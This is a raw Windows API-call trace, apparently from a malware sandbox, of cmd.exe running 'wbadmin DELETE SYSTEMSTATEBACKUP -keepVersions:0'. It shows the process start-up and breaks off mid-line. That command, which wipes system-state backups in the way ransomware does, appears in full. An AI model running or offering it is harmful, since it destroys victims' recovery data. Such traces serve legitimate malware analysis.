lpSystemTimeAsFileTime=0x2ef7c4*(dwLowDateTime=0xf29de1a0, dwHighDateTime=0x1d61645)) [0076.913] GetCurrentProcessId () returned 0x9fc [0076.913] GetCurrentThreadId () returned 0xa0c [0076.913] GetTickCount () returned 0x114977f [0076.913] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef7bc | out: lpPerformanceCount=0x2ef7bc*=19726743436) returned 1 [0076.914] GetModuleHandleA (lpModuleName=0x0) returned 0x4a800000 [0076.914] __set_app_type (_Type=0x1) [0076.914] __p__fmode () returned 0x770331f4 [0076.914] __p__commode () returned 0x770331fc [0076.914] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8221a6) returned 0x0 [0076.914] __getmainargs (in: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c, _DoWildCard=0, _StartInfo=0x4a824140 | out: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c) returned 0 [0076.915] GetCurrentThreadId () returned 0xa0c [0076.915] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa0c) returned 0x60 [0076.915] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.915] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0076.915] SetThreadUILanguage (LangId=0x0) returned 0x409 [0076.915] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0076.915] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef754 | out: phkResult=0x2ef754*=0x0) returned 0x2 [0076.916] VirtualQuery (in: lpAddress=0x2ef78b, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.916] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0076.916] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0076.916] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.916] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0076.916] GetConsoleOutputCP () returned 0x1b5 [0076.916] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.916] SetConsoleCtrlHandler (HandlerRoutine=0x4a81e72a, Add=1) returned 1 [0076.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.916] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0076.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.916] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0076.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.917] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0076.917] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.917] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0076.917] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.917] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0076.917] GetEnvironmentStringsW () returned 0x4c2080* [0076.918] GetProcessHeap () returned 0x4b0000 [0076.918] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xaca) returned 0x4c2b58 [0076.918] FreeEnvironmentStringsW (penv=0x4c2080) returned 1 [0076.918] GetProcessHeap () returned 0x4b0000 [0076.918] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x4) returned 0x4c0cb8 [0076.918] GetEnvironmentStringsW () returned 0x4c2080* [0076.918] GetProcessHeap () returned 0x4b0000 [0076.918] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xaca) returned 0x4c3630 [0076.918] FreeEnvironmentStringsW (penv=0x4c2080) returned 1 [0076.918] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee6c4 | out: phkResult=0x2ee6c4*=0x68) returned 0x0 [0076.918] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x0, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x0, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0076.919] RegCloseKey (hKey=0x68) returned 0x0 [0076.919] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee6c4 | out: phkResult=0x2ee6c4*=0x68) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x0, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x9, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x9, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x9, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0076.920] RegCloseKey (hKey=0x68) returned 0x0 [0076.920] time (in: timer=0x0 | out: timer=0x0) returned 0x5e9c43c9 [0076.920] srand (_Seed=0x5e9c43c9) [0076.920] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0" [0076.920] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0" [0076.920] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.920] GetProcessHeap () returned 0x4b0000 [0076.920] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x210) returned 0x4c2080 [0076.920] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c2088, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0076.920] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0076.920] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0076.920] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.920] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0076.920] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0076.920] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0076.920] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0076.921] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0076.921] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0076.921] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0076.921] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0076.921] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0076.921] GetProcessHeap () returned 0x4b0000 [0076.921] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c2b58 | out: hHeap=0x4b0000) returned 1 [0076.921] GetEnvironmentStringsW () returned 0x4c2298* [0076.921] GetProcessHeap () returned 0x4b0000 [0076.921] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xae2) returned 0x4c4bf8 [0076.921] FreeEnvironmentStringsW (penv=0x4c2298) returned 1 [0076.921] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0076.921] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.921] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0076.921] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0076.921] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0076.921] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0076.921] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0076.921] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0076.921] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0076.921] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0076.921] GetProcessHeap () returned 0x4b0000 [0076.921] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x54) returned 0x4c56e8 [0076.921] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef490 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.921] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef490, lpFilePart=0x2ef48c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef48c*="Desktop") returned 0x25 [0076.921] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.922] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef20c | out: lpFindFileData=0x2ef20c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4c1f00 [0076.922] FindClose (in: hFindFile=0x4c1f00 | out: hFindFile=0x4c1f00) returned 1 [0076.922] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ef20c | out: lpFindFileData=0x2ef20c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4c1f00 [0076.922] FindClose (in: hFindFile=0x4c1f00 | out: hFindFile=0x4c1f00) returned 1 [0076.922] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0076.922] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ef20c | out: lpFindFileData=0x2ef20c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe392fd80, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xe392fd80, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4c1f00 [0076.922] FindClose (in: hFindFile=0x4c1f00 | out: hFindFile=0x4c1f00) returned 1 [0076.922] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.922] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0076.922] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0076.922] GetProcessHeap () returned 0x4b0000 [0076.922] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4bf8 | out: hHeap=0x4b0000) returned 1 [0076.922] GetEnvironmentStringsW () returned 0x4c4108* [0076.923] GetProcessHeap () returned 0x4b0000 [0076.923] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xb36) returned 0x4c5f48 [0076.923] FreeEnvironmentStringsW (penv=0x4c4108) returned 1 [0076.923] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.923] GetProcessHeap () returned 0x4b0000 [0076.923] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c56e8 | out: hHeap=0x4b0000) returned 1 [0076.923] GetProcessHeap () returned 0x4b0000 [0076.923] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x400e) returned 0x4c6a88 [0076.923] GetProcessHeap () returned 0x4b0000 [0076.923] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x6e) returned 0x4c2dd8 [0076.923] GetProcessHeap () returned 0x4b0000 [0076.923] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c6a88 | out: hHeap=0x4b0000) returned 1 [0076.923] GetConsoleOutputCP () returned 0x1b5 [0076.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.924] GetUserDefaultLCID () returned 0x409 [0076.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a824950, cchData=8 | out: lpLCData=":") returned 2 [0076.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef5d0, cchData=128 | out: lpLCData="0") returned 2 [0076.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef5d0, cchData=128 | out: lpLCData="0") returned 2 [0076.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef5d0, cchData=128 | out: lpLCData="1") returned 2 [0076.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a824940, cchData=8 | out: lpLCData="/") returned 2 [0076.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a824d80, cchData=32 | out: lpLCData="Mon") returned 4 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a824d40, cchData=32 | out: lpLCData="Tue") returned 4 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a824d00, cchData=32 | out: lpLCData="Wed") returned 4 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a824cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a824c80, cchData=32 | out: lpLCData="Fri") returned 4 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a824c40, cchData=32 | out: lpLCData="Sat") returned 4 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a824c00, cchData=32 | out: lpLCData="Sun") returned 4 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a824930, cchData=8 | out: lpLCData=".") returned 2 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a824920, cchData=8 | out: lpLCData=",") returned 2 [0076.925] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0076.926] GetProcessHeap () returned 0x4b0000 [0076.926] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x0, Size=0x20c) returned 0x4c2e50 [0076.926] GetConsoleTitleW (in: lpConsoleTitle=0x4c2e50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0076.926] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.926] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0076.926] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0076.926] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0076.927] GetProcessHeap () returned 0x4b0000 [0076.927] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x400a) returned 0x4c6a88 [0076.927] GetProcessHeap () returned 0x4b0000 [0076.927] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c6a88 | out: hHeap=0x4b0000) returned 1 [0076.927] _wcsicmp (_String1="wbadmin", _String2=")") returned 78 [0076.928] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17 [0076.928] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17 [0076.928] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14 [0076.928] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14 [0076.928] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5 [0076.928] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5 [0076.928] GetProcessHeap () returned 0x4b0000 [0076.928] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x58) returned 0x4c3068 [0076.928] GetProcessHeap () returned 0x4b0000 [0076.928] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x18) returned 0x4c30c8 [0076.929] GetProcessHeap () returned 0x4b0000 [0076.929] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x5c) returned 0x4c30e8 [0076.930] GetConsoleTitleW (in: lpConsoleTitle=0x2ef2c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0076.930] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0076.930] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0076.930] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0076.930] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0076.930] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0076.930] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0076.930] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0076.930] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0076.930] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0076.930] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0076.930] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0076.930] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0076.930] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0076.930] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0076.930] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0076.930] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0076.930] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0076.930] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0076.930] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0076.931] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0076.931] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0076.931] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0076.931] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0076.931] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0076.931] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0076.931] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0076.931] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0076.931] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0076.931] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0076.931] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0076.931] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0076.931] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0076.931] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0076.931] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0076.931] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0076.931] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0076.931] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0076.931] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0076.931] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0076.931] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0076.931] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0076.931] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0076.931] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0076.931] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0076.931] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0076.931] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0076.931] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0076.931] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0076.931] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0076.931] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0076.931] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0076.932] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0076.932] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0076.932] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0076.932] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0076.932] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0076.932] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0076.932] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0076.932] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0076.932] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0076.932] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0076.932] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0076.932] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0076.932] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0076.932] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0076.932] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0076.932] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0076.932] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0076.932] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0076.932] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0076.932] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0076.932] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0076.932] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0076.932] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0076.932] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0076.932] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0076.932] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0076.932] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0076.932] _wcsicmp 